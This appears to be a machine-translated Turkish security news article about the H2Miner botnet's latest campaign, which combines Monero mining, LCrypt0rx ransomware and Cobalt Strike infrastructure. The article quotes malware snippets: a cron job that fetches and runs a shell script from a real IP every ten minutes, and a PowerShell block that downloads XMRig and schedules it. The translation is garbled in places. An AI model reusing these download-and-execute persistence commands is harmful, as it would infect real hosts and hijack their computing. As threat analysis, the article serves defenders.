İlk olarak 2019’un sonlarında gözlemlenen H2Miner Botnet, kriptaj ve fidye yazılımı arasındaki çizgiyi bulanıklaştıran genişletilmiş bir cephanelikle yeniden ortaya çıktı.
En son kampanya, Linux ana bilgisayarlarını, Windows iş istasyonlarını ve konteyner iş yüklerini aynı anda tehlikeye atmak için ucuz sanal özel sunucular (VPS) ve emtia kötü amaçlı yazılımlardan yararlanır.
Buluta duyarlı kabuk komut dosyalarını, çapraz derlenmiş ikili betikleri ve kara geçirme komutlarını zincirleyerek, operatörler ilk dayanaktan Monero madenciliğine hızla döner-genellikle savunucular CPU yükündeki artışı fark etmeden önce.
Saldırılar, yanlış yapılandırılmış hizmetlerin fırsatçı kullanımı veya Apache Activemq (CVE-2023-46604) ve Log4shell gibi savunmasız uygulamalarla başlar.
İçeri girdikten sonra, BOTNET, rakip madencileri sonlandıran, uç nokta korumasını devre dışı bırakan ve 78.153.140.66’dan XMRIG ikilisini getiren Windows’ta Linux ve 1.ps1’de özel yükleyici komut dosyalarını (Ce.sh ve 1.ps1) dağıtır. Konteynerler bağışlanmaz: SPR.SH Docker görüntülerini tarar ve kinsing düşürmeden önce Alibaba Cloud’un Aegis ajanını çıkarır.
Aynı altyapı, olgun, çok katmanlı komut ve kontrol (C2) tasarımını gösteren yükleri “Microsoftsoftware.exe” olarak gizleyen 47.97.113.36’da bir Cobalt Strike Takım Sunucusuna ev sahipliği yapıyor.
Fortinet analistleri, yeni bir VBScript fidye yazılımının LCRYPT0RX’in şimdi madencilerin yanında paketlendiğini belirtti.
.webp)
Şifreleme rutini ilkel olmasına rağmen-dosya başına bir tuza dikilmiş 8.192 karakterlik bir xor tuşu, komut dosyası hala ana önyükleme kaydının üzerine yazıyor ve sistemi tuzak kalıcılık kancalarıyla kirletiyor.
.webp)
Cüzdanların örtüşmesi ve barındırma adresleri, H2Miner’ın orijinal ekibi ile işbirliğini veya doğrudan kontrolü önerir.
.webp){kind=spacer}
Bu, Ce.sh’nin her on dakikada bir kendini yeniden indiren bir cron işini nasıl implant ettiğini gösterir:-
( crontab -l 2>/dev/null ; \
echo "*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh" ) | crontab -Bunun yanı sıra, 1.ps1’in XMRIG’yi planlanmış bir görev olarak kaydettiği Windows muadilini vurgular:
$miner = "$env:TEMP\sysupdate.exe"
Invoke-WebRequest -Uri "http://78.153.140.66/xmrig.exe" -OutFile $miner
schtasks /create /f /tn "Update service for Windows Service" `
/tr "$miner" /sc minute /mo 15 /rl highestEnfeksiyon mekanizması ve kalıcılık
H2Miner’in yapışkan gücü katmanlı enfeksiyon dizisinden kaynaklanır. İlk kabuk komut dosyaları savunma süreçlerini sıralıyor, acımasız düzenli ifadelerle öldürüyor ve kabuk geçmişini temizleyerek denetim yollarını siliyor.
.webp)
Windows’ta LCrypt0rx, Shell.Application kendini yeniden başlatmak için wscript.exe /elevateddaha sonra Winlogon Shell ve Ifeo Keys yolunu yanlış yazarak kalıcılığı sağlamlaştırmaya çalışır.
Bu kayıt defteri mantığı başarısız olsa da, kötü amaçlı yazılım altı yardımcı komut dosyasını yerleştirerek telafi eder – advapi32_ext.vbshangi döngü taskkill /f /im *av*.exeile USB_bridge.vbsilkel bir Autorun propagandası.
Her yardımcı düştü +h +s +r nitelikler ve altına çağrılan HKCU\Software\Microsoft\Windows\CurrentVersion\Runen az bir kopyanın temizlikten kurtulmasını sağlamak.
Bu kemer ve süzıcılar yaklaşımı, cpr.sh gibi sık güncelleyici komut dosyaları ile birleştiğinde, kısmi bir tahliyeden sonra bile botnet yeniden doğma madencilerinin izin verir.
Savunucular için bu, uç nokta iyileştirmesinin konteyner görüntülerini, planlanan görevleri, cron girişlerini ve haydut kayıt anahtarlarını içermesi gerektiği anlamına gelir; Aksi takdirde, Monero cüzdanları – özellikle 4ask4rhu… p8sahc – ilk uyarı kapatıldıktan çok sonra çalınan hesaplama döngülerini sifonlamaya devam edecektir.
Tespiti artırın, uyarı yorgunluğunu azaltın, yanıtı hızlandırın; Güvenlik ekipleri için inşa edilmiş etkileşimli bir sanal alan ile hepsi -> Herhangi bir deneyin.